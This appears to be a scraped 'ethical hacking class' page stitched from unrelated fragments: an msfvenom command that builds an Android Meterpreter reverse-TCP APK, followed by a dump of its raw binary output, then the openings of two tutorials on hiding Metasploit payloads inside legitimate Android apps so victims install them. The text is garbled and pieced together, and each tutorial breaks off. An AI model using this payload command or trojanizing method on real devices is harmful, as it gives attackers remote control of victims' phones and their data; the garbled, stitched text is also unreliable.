DARK ACADEMY - LEARN HOW TO HACK SYSTEM, WEB, API'S, IOT, ANDROID/IOS - FREE ETHICAL HACKING CLASS

On the kali linux terminal type - (root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk   [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10184 bytes PD�>T�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O��@��@��"��]T�`B�▒+8��Z������� U�K>@�]tQU�˪� uY� S�V{�B��F�E*~&B��n�,tz��                       =�����^@?B�@B3���2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!� �j� Nh���k�f�              �} }                  ��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K▒q%����}���T@�]�����K����=�z��-FM��s\)E{��MK?��G ��o�~��3��I�?��V�"ε2�qԏ�te        ���;�� �$jR�<�ef�#5�=z�T�8-#�5����.��h��3�~��O��t       ��i��^��ۼ���5��~%S,��C-C> \M?s�KI�az_/��[vγ�▒��▒�0�ȸ�2���E��,^�9�Ĕ�2z�▒��d�_��F*�z���lI򈘹�±,����*���7�eZO� X^�^�H�����X{�j�7ތY�u���l���ά�K�s�$��+&g

Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually Hi guys, I'm here again with my second tutorial, as I promised. Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system. The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone? One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original

 Injecting Metasploit Payloads into Android Applications It is possible to use a legitimate Android application as a Trojan in order to exploit the actual device of the user. The reasons of why this test is important in every android security assessment is because it would allow the penetration tester to discover if there are certain protections around the binary in place. If there are not and the application could be trojanized by a malicious attacker then the client should be aware. The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However if in an engagement time is not a factor then the manual method should be considered. Payload Generation Before anything else the payload needs to be generated that it will be used in order to compromise the mobile device. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK file.